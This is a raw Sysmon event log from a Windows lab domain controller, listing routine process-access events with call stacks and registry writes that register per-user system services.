12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F40DE5A411D60B31E88A5F639AF2AF,SHA256=320B8620AE2FC84E14552A165D6DAA97116D0F0A8DF4D854450B7BDAE4FAAEBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.120{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.120{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1dc37|C:\Windows\system32\services.exe+17f38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 
13241300x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\Description@%%SystemRoot%%\system32\WpnUserService.dll,-2 13241300x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\FailureActionsBinary Data 13241300x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\Security\SecurityBinary Data 13241300x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\DisplayNameWindows Push Notifications User Service_b6adb 13241300x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 
12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-14000 13241300x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\Security\SecurityBinary Data 13241300x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\DisplayNameUser Data Access_b6adb 13241300x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 
13241300x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-10002 13241300x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\Security\SecurityBinary Data 10341000x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\DisplayNameUser Data Storage_b6adb 13241300x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\ImagePathC:\Windows\System32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 
12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-15000 13241300x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 